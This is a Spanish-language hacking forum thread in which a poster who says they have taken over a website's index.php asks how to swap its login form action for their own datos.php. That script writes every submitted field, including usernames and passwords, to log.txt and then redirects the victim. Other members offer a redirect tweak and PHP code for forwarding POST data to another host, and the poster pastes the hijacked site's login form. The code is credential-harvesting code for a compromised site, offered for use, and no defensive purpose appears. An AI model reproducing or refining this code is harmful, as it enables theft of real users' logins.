 Autor
|
Tema: duda sobre pishing.php (Leído 5,224 veces)
|
|
.:UND3R:.
|
Hola a todos bueno les cuento tengo una duda lo que pasa es que logre tomar el control de un index.php y quiero editar el <form method="post" ACTION= datos.phpel codigo de datos.php pienso ponerle esto: <?php
header ('Location: http://www.web.com/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> pero si ago lo anterior ningun usuario podria autentificarse ya que solamente guardaria los datos y despues lo redireccionaria a otra web  me gustaria que redireccionara autentificado,existe alguna manera para que se guarden los datos del form o que se intercepten y que despues se logue? si me pudieran explicar un poquito se los agradeceria demasiado desde ya gracias
|
|
|
|
« Última modificación: 4 Marzo 2010, 19:14 pm por bikutoru123 »
|
En línea
|
 Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM) |
|
|
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
 Desconectado
Mensajes: 5.110
|
Pon esto al final: header ('Location: http://www.web.com/ ');
|
|
|
|
|
En línea
|
|
|
|
|
.:UND3R:.
|
No lo logre :/ me redirecciona a la pagina pero no logueado este es una parte del form de la pagina <form action='' method='post' name='login_account' id='login_account'> se podria poner 2 action cosa que pase por el mio (dato.php) y despues por el normal de la web? gracias  |
|
|
|
|
En línea
|
Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
|
|
|
luiggy2
Desconectado
Mensajes: 439
¡ Hello word ! XD
|
Si, mirate este código para enviar datos por post a otra web: <? $host="www.tupagina.com"; $referer="http://referer.com"; $uri="/pagina.php"; $vars="¶metro1=valor1¶metro2=valor2"; $header = "Host: $host\r\n"; $header .= "User-Agent: Mosaic\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header.="Referer: $referer\r\n"; $header .= "Content-Length: ".strlen($vars)."\r\n"; $header.="Pragma: no-cache\r\n"; $header .= "Connection: close\r\n\r\n"; $fp = pfsockopen("tcp://".$host, 80, $errno, $errstr, 20); fputs($fp, "POST $uri HTTP/1.1\r\n"); fputs($fp, $header.$vars); echo fgets($fp, 128)."<br>"; } ?>
fuente:http://pastebin.com/f7f667268 Saludos! |
|
|
|
|
En línea
|
" Las grandes ideas suelen salir la mayoría de veces de grandes estupideces "
|
|
|
|
.:UND3R:.
|
:B soy un poco nulo con esto de php osea el codigo que me mandaste en el index ¿lo pongo asi? <form method="post" ACTION=codigo.phpy en el codigo.php pongo el codigo que me enviaste _____________________________________0 $referer="http://referer.com";
$uri="/pagina.php"; esta es la ruta de la pagina web original? en que lugar de mi pagina queda guardado los datos? muchas gracias por tu ayuda |
|
|
|
|
En línea
|
Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
|
|
|
|
Shell Root
|
Sabes programar, PHP?
|
|
|
|
|
En línea
|
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
|
|
|
|
.:UND3R:.
|
no,soy pequeño de echo todavia no soy mayor de edad,pretendo estudiarlo en la universidad,porfavor una ayuda  hice esto: <?php
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
header ('Location: http://fantazymu.web.id/index.php/ ');
exit;
?> pero todavia no logro entrar como autentificado el form de la pagina es este: <form action='' method='post' name='login_account' id='login_account'>
<table width='166' border='0' cellspacing='0' cellpadding='0'>
<tr>
<td height='16' colspan='2' class='text_login' scope='row' align='left'>Username</td>
</tr>
<tr>
<th height='16' colspan='2' scope='row'><div align='left'>
<input name='login' type='text' class='login_field' id='login' title='Username' size='15' maxlength='10'>
<input name='account_login' type='hidden' id='account_login' value='account_login'>
</div></th>
</tr>
<tr>
<td height='16' colspan='2' class='text_login' scope='row' align='left'>Password</td>
</tr>
<tr>
<th colspan='2' scope='row'><div align='left'>
<input name='pass' type='password' class='login_field' id='pass' title='Password' size='15' maxlength='10'>
</div></th>
</tr>
<tr>
<th width='62' height='33' scope='row'><div align='left'>
<input name='Submit' type='submit' class='button' value='Login!' title='Login'>
</div></th>
<td width='104' scope='row'><div align='left' title='Lost Password' class='link_menu'><a href='http:/uyquelindaweb/index.php?op=lostpassword'>Lost Password </a></div></td>
</tr>
</table>
</form> lo que ago es cambiar <form action='' method='post' name='login_account' id='login_account'> por esto <FORM METHOD="post" ACTION="datos.php"> |
|
|
|
|
En línea
|
Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
|
|
|
Nakp
casi es
Ex-Staff
Desconectado
Mensajes: 6.336
he vuelto :)
|
|
|
|
|
|
En línea
|
Ojo por ojo, y el mundo acabará ciego.
|
|
|
|
WHK
|
no puedes hacer eso, tienes que autentificar sesiones con las cookies, enviar y recibir headers o hacer un bouncer.
|
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Pishing Web (Advertencia: Posible sitio de phishing.)
Desarrollo Web
|
MeCraniDOS
|
5
|
4,007
|
7 Enero 2013, 12:44 pm
por Novlucker
|
|
|
|
BACKTRACK 5 R3 PISHING
Hacking
|
ZuriaHack
|
0
|
1,968
|
11 Julio 2013, 15:09 pm
por ZuriaHack
|
|
|
|
Hacking basico - consulta sobre pishing, las pass no se guardan
Hacking
|
noquiero
|
1
|
2,503
|
22 Abril 2015, 15:19 pm
por Pablo Videla
|
|
|
|
Duda:Pishing + True Login
Hacking
|
Rusty_125
|
0
|
1,283
|
3 Febrero 2019, 19:04 pm
por Rusty_125
|
|
|
|
FACEBOOK PISHING
Seguridad
|
VictorT
|
2
|
2,601
|
15 Julio 2019, 23:27 pm
por MCKSys Argentina
|
 |
- 